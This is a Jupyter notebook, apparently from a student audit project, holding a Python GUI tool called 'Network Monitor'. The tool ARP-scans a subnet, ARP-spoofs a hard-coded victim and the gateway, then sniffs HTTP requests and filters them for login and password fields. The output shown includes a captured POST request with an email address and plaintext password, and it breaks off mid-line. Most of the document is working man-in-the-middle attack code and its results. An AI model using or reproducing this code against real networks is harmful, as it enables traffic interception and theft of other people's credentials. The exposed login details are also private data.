In [1]:
import scapy.all as scapy
from scapy.layers import http
import netifaces
import subprocess
import time
import threading
import argparse

import tkinter as tk
from tkinter import ttk
from tkinter import *
from tkinter.ttk import *
from tkinter import scrolledtext as st
import sys
from tkinter import filedialog as fd
from tkinter import messagebox as mb
from playsound import playsound

class Monitor:
    
    def __init__(self, window):
        # Initializations
        self.ip = StringVar()
        self.mac = StringVar()
        self.wind = window
        self.wind.geometry('650x600')

        self.wind.title('Network Monitor')
        
        self.labelIp = Label(self.wind, text='IP: ')
        self.labelIp.place(x=150, y=10)
        #self.labelIp.grid(column=0, row=1)
        self.inputIp = Entry(self.wind, textvariable = self.ip)
        self.inputIp.place(x=200, y=10)
        #self.inputIp.grid(column=1, row=1)
        
        self.labelMac = Label(self.wind, text='MAC: ')
        self.labelMac.place(x=150, y=40)
        #self.labelMac.grid(column=0, row=2)
        self.inputMac = Entry(self.wind, textvariable = self.mac)
        #self.inputMac.grid(column=1, row=2)
        self.inputMac.place(x=200, y=40)
        
   
        #self.scrolledtext1=st.ScrolledText(self.wind, width=100, height=10)
        #self.scrolledtext1.pack(fill=tk.BOTH, side=tk.LEFT, expand=True)
        print("Gateway: "+ str(self.get_default_gateway()))
        self.scanned_output = self.scan(str(self.get_default_gateway())+'/24')
        self.build_table_IP(self.scanned_output)
        
    def build_table_IP(self, result):
        self.table =ttk.Treeview(self.wind)
        self.table.place(x=150,y=130)
        self.table['columns']=('ip','mac')
        
        self.table.column('#0', width=0, stretch=NO)
        self.table.column('ip', anchor=CENTER, width=120)
        self.table.column('mac', anchor=CENTER, width=150)
        
        self.table.heading('#0',text = '', anchor = CENTER)
        self.table.heading('ip', text = 'Direcciòn IP', anchor = CENTER)
        self.table.heading('mac', text = 'Direcciòn MAC', anchor = CENTER)
        for i in self.result:
            if str(i["ip"]) != str(self.get_default_gateway()):
                self.table.insert(parent='', index=0, text='', values=(i["ip"],i["mac"]))
            
            
        self.table.bind("<Double- 1>", self.select_click_ip_mac)
        
    def load_buttons(self):
        self.ButtonMonitor = Button(text="Process", command=self.get_spoof_script)
        self.ButtonMonitor.place(x=200, y=70)
        
    def select_click_ip_mac(self, event):
        item = self.table.identify('item',event.x,event.y)
        self.ip.set(self.table.item(item,"values")[0])
        self.mac.set(self.table.item(item,"values")[1])
                                    
    def scan(self,ip):
        self.arp_req_frame = scapy.ARP(pdst = ip)
        self.broadcast_ether_frame = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff")
    
        self.broadcast_ether_arp_req_frame = self.broadcast_ether_frame / self.arp_req_frame

        self.answered_list = scapy.srp(self.broadcast_ether_arp_req_frame, timeout = 1, verbose = False)[0]
        self.result = []
        for i in range(0,len(self.answered_list)):
            self.client_dict = {"ip" : self.answered_list[i][1].psrc, "mac" : self.answered_list[i][1].hwsrc}
            self.result.append(self.client_dict)

        return self.result
    
    def print_ip_gateway(self):
        self.gateway = self.get_default_gateway()
        print("Ip: "+ str(self.ip.get()) + " gateway: " + str(self.gateway))
        
    def get_default_gateway(self):        
        self.gateways = netifaces.gateways()
        if 'default' in self.gateways and netifaces.AF_INET in self.gateways['default']:
            return self.gateways['default'][netifaces.AF_INET][0] 
        
    def play(self):
        playsound('/home/kali/Desktop/Develop/final/final-project-audit/alarm-clock.mp3')
    
    def get_spoof_script(self):
        self.gateway = self.get_default_gateway()
        hilo = MiHilo()
        hilo.run('192.168.1.57',self.gateway)
        #useless_call = subprocess.Popen(['python3', 'arpspoofme.py', '-t',str(self.ip.get()),'-g',
        #                                str(self.gateway)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, 
        #                                stderr=subprocess.PIPE, text=True)
        
        #output, errors = useless_call.communicate(input="Hello from the other side!")
        #print(output)
        #print(errors)

class MiHilo(threading.Thread):
    def run(self,victima,gateway):
        global sent_packets_count
        sent_packets_count = 0
        try:
            hilo_sniff = HiloSniffer()
            hilo_sniff.start()
            while sent_packets_count <= 20:
                self.spoof(gateway, victima)
                self.spoof(victima, gateway)
                sent_packets_count = sent_packets_count + 2
                print("\r[+] Packets Sent: "+str(sent_packets_count))
                time.sleep(2)
                
            #print("\n[-] Restoring the ARP Tables..... Be Patient")
            #self.restore(victima, gateway)
            #self.restore(gateway, victima)
        except KeyboardInterrupt:
            print("\n[-] Detected Ctrl + C..... Restoring the ARP Tables..... Be Patient")
            self.restore(victima, gateway)
            self.restore(gateway, victima)
    
    def mac(self,ip):
        arp_request = scapy.ARP(pdst = ip)
        broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff")
        arp_request_broadcast = broadcast / arp_request
        answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0]
        return answered_list[0][1].hwsrc
  
    def spoof(self,target_ip, spoof_ip):
        packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = self.mac(target_ip), psrc = spoof_ip)
        subprocess.check_output(["echo"," 1 > /proc/sys/net/ipv4/ip_forward"])
        #print(packet.show()) 
        scapy.send(packet)  
        
    def restore(self,source_ip, destination_ip):
        source_mac = self.mac(source_ip)
        destination_mac = self.mac(destination_ip)
        restore_packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac)
        scapy.send(restore_packet, count =1, verbose = False)

        
class HiloSniffer(threading.Thread):       
    def run(self):
        self.sniffer("eth0")
    
    def sniffer(self,interface):
        scapy.sniff(iface=interface, store=False, prn=self.sniffed_packet)
    
    def sniffed_packet(self,packet):
        #print(packet)
        if packet.haslayer(http.HTTPRequest):
            #print("Entrò a sniff 2")
            print(packet[http.HTTPRequest])
            credentials = self.credenciales(packet)
            if credentials:
                print('Usuario/Passowrd Ingresados ' + str(credentials) + "\n")
                url = self.obt_url(packet)
                print('URL ' + str(url) + "\n")

    def credenciales(self, packet):
        print('Inicio')
        if packet.haslayer(scapy.Raw):
            load = str(packet[scapy.Raw].load)
            ##print(str(load)) 
            keywords = ["email", "username", "user", "login", "pass", "password"]
            for keyword in keywords:
                if keyword in load:
                    return load

    def obt_url(self, packet):
        return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path 
    
if __name__ == '__main__':
    window = tk.Tk()
    application = Monitor(window)
    application.load_buttons()
    window.mainloop()

Gateway: 192.168.1.254

Sent 1 packets.

Sent 1 packets.
[+] Packets Sent: 2

Sent 1 packets.

Sent 1 packets.
[+] Packets Sent: 4

Sent 1 packets.

Sent 1 packets.
[+] Packets Sent: 6
b'POST /test/exec.php HTTP/1.1\r\nHost: www.evalualos.com\r\nConnection: keep-alive\r\nContent-Length: 72\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: http://www.evalualos.com\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nReferer: http://www.evalualos.com/test/indexp.php?nolog=jsebs2016@gmail.com\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: es-419,es;q=0.9\r\nCookie: b_Admin_visibility=hidden\r\n\r\nemail=jsebs2016%40gmail.com&password=dfghjkrtyui&function=5&slang=ES.php'
Inicio
Usuario/Pas